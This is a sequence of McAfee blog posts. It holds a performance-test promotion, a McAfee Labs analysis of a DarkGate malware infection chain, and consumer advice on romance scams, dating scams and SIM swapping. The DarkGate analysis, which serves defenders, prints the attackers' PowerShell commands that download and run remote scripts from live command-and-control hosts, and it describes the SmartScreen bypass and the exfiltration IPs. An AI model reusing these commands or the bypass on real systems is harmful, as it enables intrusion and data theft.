McAfee Dominates AV-Comparatives PC Performance Test

In our digital age, a computer is not just a tool; it’s a gateway to a world of possibilities, entertainment, and creativity. The speed of everyday tasks from gaming, and streaming TV shows to editing images and videos can make us more productive but also make our computers more fun to use. When exploring our software choices, it’s vital to choose apps and services, such as online protection tools that have a minimal impact on your computer, allowing you to live your best life online, without the concerns of your PC slowing down. 

McAfee has once again proven its excellence by securing the #1 spot in the AV-Comparatives PC Performance Test. With an impressive overall impact score of only 2.8, McAfee Total Protection outperformed all other security vendors, showcasing its lightweight design and exceptional performance. Download the full report from AV-Comparatives here.

The AV-Comparatives Performance Test 

AV-Comparatives, an Austria-based test-lab renowned for its comprehensive evaluations, conducted an extensive Performance Test to measure the impact of consumer security software on system performance. In this test, 16 security products, including McAfee Total Protection, were rigorously evaluated on a low-end PC with an Intel Core i3 CPU, 4GB of RAM, and SSD system drives. The tests were conducted on a clean Windows 10, 64-Bit system with the security software installed using default settings. 

 

With an overall impact score of 2.8, McAfee Total Protection emerged as the lightest product in the test, surpassing the industry average of 12.3. This outstanding performance has earned McAfee Total Protection the highest possible ranking: ADVANCED+ 3 Stars. This achievement reaffirms McAfee’s commitment to delivering top-notch security solutions that prioritize both protection and performance. McAfee has consistently received the highest ADVANCED+ ratings for performance in all AV-Comparatives Performance Tests since October 2016. This track record of excellence demonstrates McAfee’s dedication to continuous improvement and delivering exceptional products. 

How a Faster Computer Can Help You Achieve More 

To ensure the accuracy of the results, AV-Comparatives examined various activities such as file copying, application installation and launching, file downloading, and web browsing. All tests were conducted with an active internet connection, allowing for the evaluation of the real-world impact of cloud services and features. McAfee Total Protection excelled in all these areas, showcasing its ability to provide robust security without compromising system performance. Whether you’re a gamer, a movie buff, a budding photographer, or a video editor, the enhanced performance can significantly refine how you engage with your hobbies and passions. Learn how your computer can also be more fun! 

Gaming: A Seamless Escape into Virtual Worlds 

For gamers, the benefits of a faster computer are immediately noticeable. Modern games require substantial system resources, including fast processors and powerful graphics cards, to run smoothly. Online protection with a minimal impact on your computer’s performance, lets you enjoy games as the developers intended, with minimal lag and stunning visuals. 

Streaming: Enjoying Your Favorite Shows in High Definition 

Streaming TV shows and movies has become a staple of home entertainment. Platforms like Netflix and Disney Plus offer 4K streaming for many titles and an optimized computer can mean enjoying the best streaming content without buffering.  

Image Editing: Unleashing Creative Potential 

Photography enthusiasts and graphic designers know that image editing can be resource-intensive, especially with high-resolution images and complex effects. A more efficient computer speeds up the performance of software like Adobe Photoshop, allowing for quicker loading of images, smoother application of effects, and more responsive overall editing. This not only saves time but also makes the creative process more enjoyable.  

Video Editing: Crafting Stories with Precision 

Video editing is perhaps the most demanding task that regular consumers undertake on their computers. Editing software such as Adobe Premiere Pro or Final Cut Pro can leverage the additional power of a faster computer to render video faster, apply effects more smoothly, and improve the playback of high-resolution footage in real time. This means less time waiting and more time creating.  

Protection with World-Class Performance

Investing in robust, tried, and tested online security solutions offers peace of mind, without compromises to your system performance. If you find your current computer lagging in your digital aspirations, it might be time to consider stepping up to more capable online protection. Stay protected with McAfee and experience the perfect balance of security and efficiency. 

 

 

The post McAfee Dominates AV-Comparatives PC Performance Test appeared first on McAfee Blog.

The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen

Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena

McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:

Figure 1: Geo-Distribution of DarkGate

DarkGate’s attempt to bypass Defender Smartscreen

Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.

In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is about “Internet Shortcut Files Security Feature Bypass Vulnerability”.

Infection Chain

McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:

Figure 2: Infection Chain

Infection from HTML:

The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.

Figure 3: HTML page

Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.

Figure 4: Prompt confirming redirection to Windows Explorer

Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.

Figure 5: Share Internet Shortcut via SMB

In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.

Figure 6: Javascript in HTML code

On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:

Figure 7: WebDAV share

The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.

Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.

The file is an Internet Shortcut (.url) file, containing the following content:

Figure 8: content of .URL file

The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.

Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.

The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.

If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:

Figure 9: SmartScreen prompt

On allowing execution, the vbs file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:

Figure 10: Process tree

Following are the command lines:

• “C:\Windows\System32\WScript.exe” “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”
  • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
    • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    • “C:\rjtu\AutoHotkey.exe” C:/rjtu/script.ahk
    • “C:\Windows\system32\attrib.exe” +h C:/rjtu/

The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).

Inspecting the URL “withupdate.com/zuyagaoq” explicitly allows for a detailed understanding of the infection flow:

Figure 11: Remote Script on the C2

This URL leads to a script:

Figure 12: Remote Script contentReformatting, we get:

Figure 13: Remote script content

Explanation of the script:

• ni ‘C:/rjtu/’ -Type Directory -Force: This command creates a new directory named “rjtu” in the root of the C drive if it doesn’t already exist.
• cd ‘C:/rjtu/’: This changes the current directory to the newly created “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/oudowibspr” -OutFile ‘C:/rjtu/temp_AutoHotkey.exe’: This command downloads a file from the specified URL and saves it as “temp_AutoHotkey.exe” in the “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/rwlwiwbv” -OutFile ‘C:/rjtu/script.ahk’: This downloads a file named “script.ahk” from another specified URL and saves it in the “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/bisglrkb” -OutFile ‘C:/rjtu/test.txt’: This downloads a file named “test.txt” from yet another specified URL and saves it in the “rjtu” directory.
• start ‘C:/rjtu/AutoHotkey.exe’ -a ‘C:/rjtu/script.ahk’: This command starts the executable “AutoHotkey.exe” located in the “rjtu” directory and passes “script.ahk” file as an argument.
• attrib +h ‘C:/rjtu/’: This sets the hidden attribute for the “rjtu” directory.

Checking “C:/rjtu”:

Figure 14: Dropped folder

AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.

To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).

Following is the ahk script file content:

Figure 15: Content of .ahk script

There are a lot of comments added in the script, simplifying the script, we get:

Figure 16: .ahk script after removing junk

This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.

Now, it’s confirmed that the shellcode resides within the contents of “test.txt”. This is how the text.txt appears:

Figure 17: Content of test.txt

We analyzed the memory in use for Autohotkey.exe.

Figure 18: Memory of running instance of AutoHotKey.exeWe dumped the memory associated with it and found that it was the same as the content in test.txt.

Figure 19: Memory dump of running AutoHotKey.exe same as test.txt

This is the shellcode present here.  The first 6 bytes are assembly instructions:

Figure 20: Shellcode A in the beginning

Following the jump instructions of 3bf bytes, we reach the same set of instructions again:

Figure 21: Same Shellcode A after jump

This means another jump with be taken for another 3bf bytes:

Figure 22: Same Shellcode A one more time

We have encountered same set of instructions again, taking another jump we reach to:

Figure 23: New Shellcode B found next.

These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.

Figure 24: Shellcode B followed by PE file highlighted

This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:

Figure 25: After debugging found next Shellcode C

This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.

Figure 26: Shellcode C directing to entry point of the PE file

Upon debugging this code, we figured out that in marked “call eax” instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.

This is the final DarkGate payload which is a Delphi-compiled executable file:

Figure 27: Darkgate payload.

Upon this, we see all the network activity happening to C2 site:

Figure 28: Network Communication

Figure 29: C2 IP address

The exfiltration is done to the IP address 5.252.177.207.

Persistence:

For maintaining persistence, a .lnk file is dropped in startup folder:

Figure 30: Persistence

Content of lnk file:

Figure 31: Content of .lnk used for persistence

The shortcut file (lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.

Figure 32: Folder dropped in “C:\ProgramData”

Inside this folder, all the same files are present:

Figure 33: Same set of files present in dropped folder

Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.

Infection from XLS:

The malicious excel file asks the user to click on “Open” to view the content properly.

Figure 34: XLS sample

Upon clicking on “Open” button, user gets the following prompt warning the user before opening the file.

Figure 35: XLS files trying to download and run VBS file

For our analysis, we allowed the activity by clicking on “OK”. Following this we got the process tree as:

Figure 36: Process tree from Excel file

The command lines are:

• “C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE” “C:\Users\admin\Documents\Cluster\10-apr-xls\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”
  • “C:\Windows\System32\WScript.exe” “\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
    • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • “C:\kady\AutoHotkey.exe” C:/kady/script.ahk
      • “C:\Windows\system32\attrib.exe” +h C:/kady/

The file it gets from “103.124.106[.]237/wctaehcw” has the following content:

Figure 37: Remote script simliar to previous chain

From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.

Mitigation:

• Verify Sender Information
• Think Before Clicking Links and Warnings
• Check for Spelling and Grammar Errors
• Be Cautious with Email Content
• Verify Unusual Requests
• Use Email Spam Filters
• Check for Secure HTTP Connections
• Delete Suspicious Emails
• Keep Windows and Security Software Up to date

Indicators of Compromise (IoCs):

File	Hash
Html file	196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
URL file	2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
VBS	038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
autohotkey.exe	897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
AHK script	dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
test.txt	4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
DarkGate exe	6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
IP	5.252.177.207
XLS file	1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
VBS	2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
LNK file	10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
IP	103.124.106.237

Table 1: IOC table

The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.

How to Avoid Romance Scams 

It’s the romance scam story that plays out like a segment on a true crime show. It starts with a budding relationship formed on an online dating site. It ends with an ominous note and an abandoned car on a riverside boat ramp hundreds of miles away from the victim’s home. 

The story that follows offers a look at how far romance scams can go. With that, we warn you that this story comes to a grim ending. We share it to show just how high the stakes can get in these scams and how cunning the scammers who run them can be.  

Most importantly, it gives us an opportunity to show how you can spot and avoid romance scams in all their forms. 

Laura’s story

As recently reported across several news outlets, comes the story of Laura, a 57-year-old retired woman from Chicago who joined an online dating service in search of a relationship. She went with a known site, thinking it would be safer than some of the other options online.  

Sure enough, she met “Frank Borg,” who posed as a ruggedly good-looking Swedish businessman. A relationship flourished, and within days the pair professed their love for each other. 

Over time, however, the messages became increasingly transactional. Transcripts show that “Frank” started asking for money, which Laura wired to a bogus company. All to the eventual tune of $1.5 million and a mortgaged home. 

Yet the scam cut yet deeper than that. “Frank” then had her open several phony dating profiles on different online dating sites, set up new bank accounts, and further spin up fake companies. In all, “Frank” appears to not only have scammed Laura, he also weaponized her — turning her into an accomplice as “Frank” sought to scam others.  

As the account goes, Laura grew suspicious about a year into the scam. A gap appears in her correspondence with “Frank,” and it appears that some conversations went offline. Today, Laura’s daughter speculates that her mother knew that what she was doing was illegal and was threatened to keep at it. 

The story ends two years after the romance started, with Laura going missing, only to be found drowned in the Mississippi River. Left behind, a note, found by her daughter while searching Laura’s house. It wrote of living a double life that left her broke because of “Frank.” The note also left instructions for accessing her email, which chronicled the online part of the affair in detail. 

Investigations found no clear evidence of foul play, yet several questions remain. What is known is that “Frank’s” profile picture was a doctor from Chile and that the emails originated in Ghana. 

The cost of romance scams

While Laura’s story falls into a heartbreaking extreme, romance scams of all sorts happen often enough. According to the Federal Bureau of Investigation’s (FBI) 2023 Internet Crime Report, losses to reported cases of romance scams topped more than $650 million.ⁱ  

The U.S. Federal Trade Commission (FTC) cites even higher figures for 2023, at $1.4 billion, for a median loss of $2,000 per reported case.ⁱⁱ That makes romance scams the highest in reported losses for any form of imposter scam according to the FTC. 

Sadly, many romance scams go unreported. The reasons vary. Understandably, some victims feel ashamed. This is particularly the case when it comes to older victims. Many fear their friends and families might take it as a sign that they aren’t able to fully care for themselves anymore. Other victims might feel that the romance was real — that they weren’t scammed at all. They believe that their love interest will come back. 

Practically anyone can fall victim to a romance scam. People of all ages and backgrounds have found themselves entangled in romance scams. With that, there should be no shame. These scammers have shown time and time again how sophisticated their playbooks are. They excel at slow and insidious manipulation over time.  

When the scammer starts asking for money, the victim is locked in. They believe that they’re in love with someone who loves them just the same. They fork over the money without question. And that’s what makes these scams so exceptionally damaging. 

Signs of a romance scam to look out for

Sophisticated as these scammers are, you can spot them.  

Even with the arrival of AI chat tools and deepfake technology, romance scammers still rely on a set of age-old tricks. Ultimately, romance scammers play long and patient mind games to get what they want. In many cases, scammers use scripted playbooks put together by other scammers. They follow a common roadmap, one that we can trace and share so you can avoid falling victim. 

Top signs include … 

It seems too good to be true. 

If the person seems like a perfect match right from the start, be cautious. Scammers often stake out their victims and create profiles designed to appeal to their desires and preferences. In some cases, we’ve seen instances where a scammer uses pictures and profiles similar to the deceased partners of widowers. 

Love comes quickly. Too quickly. 

As the case was with “Frank,” two weeks hadn’t passed before the word “love” appeared in the messages. Take that as a red flag, particularly online when you’ve had no in-person contact with them. A rush into declarations of love might indicate ulterior motives. 

The story doesn’t check out. 

Victims might think they’re talking to a romantic partner, yet they’re talking with a scammer. Sometimes several different scammers. As we’ve shown in our blogs before, large online crime organizations run some romance scams. With several people running the scam, inconsistencies can crop up. Look out for that.  

What’s more, even individual scammers forget details they’ve previously shared or provide conflicting info about their background, job, or family. It’s possible that one romance scammer has several scams going on at once, which can lead to confusion on their part. 

You feel pressured. 

Romance scammers pump their victims for info. With things like addresses, phone numbers, and financial details, scammers use that info to commit further identity theft or scams. If someone online presses you for this info, keep it to yourself. It might be a scam.  

Another mark of a scam — if the person asks all sorts of prying questions and doesn’t give up any such info about themselves. A romance scam is very one way in this regard. 

You’re asked for money in some form or fashion. 

This is the heart of the scam. With the “relationship” established, the scammer starts asking for money. They might ask for bank transfers, cryptocurrency, money orders, or gift cards. In all, they ask for funds that victims have a tough time getting refunded, if at all. Consider requests for money in any form as the reddest of red flags. 

Watch out for AI. 

Scammers now use AI. And that actually gives us one less tell-tale sign of a romance scam. It used to be that romance scammers refused to hop on video calls as they would reveal their true identities. The same for voice chats. (Suddenly, that Swedish businessman doesn’t sound so Swedish.) That’s not the case anymore. With AI audio and video deepfake technology so widely available, scammers can now sound and look the part they’re playing — in real time. AI mirrors every expression they make as they chat on a video call.  

As things stand now, these technologies have limits. The AI can only track faces, not body movements. Scammers who use this technology must sit rather rigidly. Further, many AI tools have a hard time capturing the way light reflects or catches the eye. If something looks off, the person on the other end of the call might be using deepfake technology. 

The important point is this: today’s romance scammers can make themselves appear like practically anyone. Just because you’re chatting with a “real” person on a call or video meeting, that’s no guarantee they are who they say.  

How to make it tougher for a romance scammer to target you

Romance scammers track down their victims in several ways. Some scammers blast out direct messages and texts en masse with the hope they’ll get a few bites. Others profile their potential victims before they contact them. Likewise, they’ll research anyone who indeed gives them a bite with a response to a blast. 

In all cases, locking down your privacy can make it tougher for a scammer to target you. And tougher for them to scam you if they do. Your info is their goldmine, and they use that info against you as they build a “relationship” with you.  

With that in mind, you can take several steps … 

Make your social media more private. Our new McAfee Social Privacy Manager personalizes your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This makes sure that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public can see it. Including scammers. 

Watch what you post on public forums. As with social media, scammers harvest info from online forums dedicated to sports, hobbies, interests, and the like. If possible, use a screen name on these sites so that your profile doesn’t immediately identify you. Likewise, keep your personal details to yourself. When posted on a public forum, it becomes a matter of public record. Anyone, including scammers, can look it up. 

Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. That includes your contact info. Running it regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically.  

Delete your old accounts. Yet another source of personal info comes from data breaches. Scammers use this info as well to complete a sharper picture of their potential victims. With that, many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result. 

Stay extra skeptical of sudden romance online

We’ve always had to keep our guard up to some extent when it comes to online romance. Things today call for even more skepticism. Romance scams have become tremendously more sophisticated, largely thanks to AI tools. 

Even with technology reshaping the tricks scammers can pull, recognizing that their tactics remain the same as ever can protect you from harm.  

Romance scammers flatter, manipulate, and pressure their way into the lives of their victims. They play off emotions and threaten to “leave” if they don’t get what they ask for. Emotionally, none of it feels right. Any kind of emotional extortion like that is a sign to end an online relationship, hard as that might be. 

The trick is that the victim might be in deep at that point. They might not act even if things feel wrong. That’s where family and friends come in. If something doesn’t feel right, share what’s happening with someone you’ve known and trusted for years. That can help clear up any clouded judgment. Sometimes it takes an extra set of eyes to spot a scammer. 

If you or someone you know falls victim to a romance scam, remember that no one is alone in this. Thousands and thousands of others are victims too. It might come as some comfort, particularly as many, many victims are otherwise savvy and centered people. Anyone, anyone, can find themselves a victim. 

Lastly, romance scams are crimes. If one happens to you, report it. In the U.S., you can report it to the FBI’s Internet Crime Complaint Center (IC3) and you can file a complaint with the FTC. Also, report any theft or threats to your local authorities.  

In all, the word on romance online is this — take things slowly. “Love” in two weeks or less hoists a big red flag. Very much so online. Know those signs of a scam when you see them. And if they rear their head, act on them. 

The post How to Avoid Romance Scams  appeared first on McAfee Blog.

How to Protect Your Smartphone from SIM Swapping

You consider yourself a responsible person when it comes to taking care of your physical possessions. You’ve never left your wallet in a taxi or lost an expensive ring down the drain. You never let your smartphone out of your sight, yet one day you notice it’s acting oddly.  

Did you know that your device can fall into cybercriminals’ hands without ever leaving yours? SIM swapping is a method that allows criminals to take control of your smartphone and break into your online accounts. 

Don’t worry: there are a few easy steps you can take to safeguard your smartphone from prying eyes and get back to using your devices confidently. 

What Is a SIM Card? 

First off, what exactly is a SIM card? SIM stands for subscriber identity module, and it is a memory chip that makes your phone truly yours. It stores your phone plan and phone number, as well as all your photos, texts, contacts, and apps. In most cases, you can pop your SIM card out of an old phone and into a new one to transfer your photos, apps, etc. 

What Is SIM Swapping? 

Unlike what the name suggests, SIM swapping doesn’t require a cybercriminal to get access to your physical phone and steal your SIM card. SIM swapping can happen remotely. A hacker, with a few important details about your life in hand, can answer security questions correctly, impersonate you, and convince your mobile carrier to reassign your phone number to a new SIM card. At that point, the criminal can get access to your phone’s data and start changing your account passwords to lock you out of your online banking profile, email, and more. 

SIM swapping was especially relevant right after the AT&T data leak. Cybercriminals stole millions of phone numbers and the users’ associated personal details. They could later use these details to SIM swap, allowing them to receive users’ text or email two-factor authentication codes and gain access to their personal accounts. 

How Can You Tell If You’ve Been SIM Swapped? 

The most glaring sign that your phone number was reassigned to a new SIM card is that your current phone no longer connects to the cell network. That means you won’t be able to make calls, send texts, or surf the internet when you’re not connected to Wi-Fi. Since most people use their smartphones every day, you’ll likely find out quickly that your phone isn’t functioning as it should.  

Additionally, when a SIM card is no longer active, the carrier will often send a notification text. If you receive one of these texts but didn’t deactivate your SIM card, use someone else’s phone or landline to contact your wireless provider. 

How to Prevent SIM Swapping 

Check out these tips to keep your device and personal information safe from SIM swapping.  

1. Set up two-factor authentication using authentication apps. Two-factor authentication is always a great idea; however, in the case of SIM swapping, the most secure way to access authentication codes is through authentication apps, versus emailed or texted codes. It’s also a great idea to add additional security measures to authentication apps, such as protecting them with a PIN code, fingerprint, or face ID. Choose pin codes that are not associated with birthdays, anniversaries, or addresses. Opt for a random assortment of numbers.  
2. Watch out for phishing attempts. Cybercriminals often gain fodder for their identity-thieving attempts through phishing. Phishing is a method cybercriminals use to fish for sensitive personal information that they can use to impersonate you or gain access to your financial accounts. Phishing emails, texts, and phone calls often use fear, excitement, or urgency to trick people into giving up valuable details, such as social security numbers, birthdays, passwords, and PINs. Be wary of messages from people and organizations you don’t know. Even if the sender looks familiar, there could be typos in the sender’s name, logo, and throughout the message that are a good tipoff that you should delete the message immediately. Never click on links in suspicious messages. 
3. Use a password manager. Your internet browser likely asks you if you’d like the sites you visit to remember your password. Always say no! While password best practices can make it difficult to remember all your unique, long, and complex passwords and passphrases, do not set up autofill as a shortcut. Instead, entrust your passwords and phrases to a secure password manager, which is included in McAfee+. A secure password manager makes it so you only have to remember one password. The rest of them are encrypted and protected by two-factor authentication. A password manager makes it very difficult for a cybercriminal to gain entry to your accounts, thus keeping them safe. 

Boost Your Smartphone Confidence 

With just a few simple steps, you can feel better about the security of your smartphone, cellphone number, and online accounts. If you’d like extra peace of mind, consider signing up for an identity theft protection service like McAfee+. McAfee, on average, detects suspicious activity ten months earlier than similar monitoring services. Time is of the essence in cases of SIM swapping and other identity theft schemes. An identity protection partner can restore your confidence in your online activities. 

 

The post How to Protect Your Smartphone from SIM Swapping appeared first on McAfee Blog.

How to Spot Dating Scams

For years now, the popularity of online dating has been on the rise—and so have the number of online romance scams that leave people with broken hearts and empty wallets.

In a recent CBS News story, one Texan woman was scammed out of $3,200 by a scammer claiming to be a German Cardiologist.  After months of exchanging messages and claiming to be in love with her, he said that he’d been robbed while on a business trip in Nigeria and needed her help.

According to the U.S. Federal Trade Commission (FTC), the reported cost of online romance scams was $1.14 billion in 2023. 

How do online dating and romance scams get started? 

Dating and romance scams aren’t limited to online dating apps and sites, they’ll happen on social media and in online games as well. However, the FTC reports that the scam usually starts the same way, typically through an unexpected friend request or a message that comes out of the blue. 

With that initial introduction made, a chat begins, and a friendship (or more) blossoms from there. Along the way, the scammer will often rely on a mix of somewhat exotic yet believable storytelling to lure the victim in, often involving their job and where they’re working. Reports say that scammers will talk of being workers on an offshore oil rig, members of the military stationed overseas, doctors working with an international organization or working in the sort of jobs that would prevent them from otherwise easily meeting up in person. 

With the phony relationship established, the scammer starts asking for money. The FTC reports that they’ll ask for money for several bogus reasons, usually revolving around some sort of hardship where they need a “little help” so that they can pay: 

• For a plane ticket or other travel expenses. 
• For medical expenses. 
• Customs fees to retrieve something. 
• Gambling debts. 
• A visa or other official travel documents. 

The list goes on, yet that’s the general gist. Scammers often employ a story with an intriguing complication that seems just reasonable enough, one where the romance scammer makes it sound like they could really use the victim’s financial help. 

Common types of online dating scams 

People who have filed fraud reports say they’ve paid their scammer in a few typical ways.  

One is by wiring money, often through a wire transfer company. The benefit of this route, for the scammer anyway, is that this is as good as forking over cash. Once it’s gone, it’s gone. The victim lacks the protections they have with other payment forms, such as a credit card that allows the holder to cancel or contest a charge. 

Another way is through gift cards. Scammers of all stripes, not just romance scammers, like these because they effectively work like cash, whether it’s a gift card for a major online retailer or a chain of brick-and-mortar stores. Like a wire transfer, once that gift card is handed over, the money on it is highly difficult to recover, if at all. 

One more common payment is through reloadable debit cards. A scammer may make an initial request for such a card and then make several follow-on requests to load it up again.  

In all, a romance scammer will typically look for the easiest payment method that’s the most difficult to contest or reimburse, leaving the victim in a financial lurch once the scam ends. 

How Do You Avoid Getting Tangled Up in an Online Dating or Romance Scam? 

When it comes to meeting new people online, the FTC suggests the following: 

• Never send money or gifts to someone you haven’t met in person—even if they send you money first. 
• Talk to someone you trust about this new love interest. It can be easy to miss things that don’t add up. So pay attention if your friends or family are concerned. 
• Take the relationship slowly. Ask questions and look for inconsistent answers. 
• Try a reverse-image search of any profile pictures the person uses. If they’re associated with another name or with details that don’t match up, it’s a scam. 

Scammers, although arguably heartless, are still human. They make mistakes. The stories they concoct are just that. Stories. They may jumble their details, get their times and dates all wrong, or simply get caught in an apparent lie. Also, keep in mind that some scammers may be working with several victims at once, which is yet another opportunity for them to get confused and slip up. 

Protecting Yourself Further From Scams on Your Social Media Accounts 

As mentioned above, some romance scammers troll social media and reach out through direct messages or friend requests. With that, there are three things you can do to cut down your chances of getting caught up with a scammer: 

1. Go private

Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and give a romance scammer less information to exploit. 

2. Say “no” to strangers bearing friend requests

Be critical of the invitations you receive. Out-and-out strangers could be more than a romance scammer, they could be a fake account designed to gather information on users for purposes of cybercrime, or they can be an account designed to spread false information. There are plenty of them too. In fact, in Q4 of 2023 alone, Facebook took action on 693 million fake accounts. Reject such requests. 

3. Protect yourself and your devices

